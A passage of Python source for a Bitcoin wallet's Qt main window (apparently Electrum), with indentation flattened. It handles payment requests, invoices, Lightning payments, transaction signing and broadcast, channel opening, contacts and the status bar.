content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except MultipleSpendMaxTxOutputs as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
def task():
coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
return fut.result()
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_bal = sum(self.wallet.get_frozen_balance())
if frozen_bal:
text += " ({} {} {})".format(
self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen")
)
return text
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if conf_dlg.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not conf_dlg.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value)
preview_dlg.show()
return
cancelled, is_send, password, tx = conf_dlg.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value)
preview_dlg.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, *, funding_sat, node_id):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(
coins=coins,
funding_sat=funding_sat,
node_id=node_id,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
node_id, rest = extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat=funding_sat, node_id=node_id)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(
connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog)
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog))
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog)
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning():
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if self.network is None or self.network.channel_db is None:
self.lightning_button.setVisible(False)
return
self.lightning_button.setVisible(True)
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
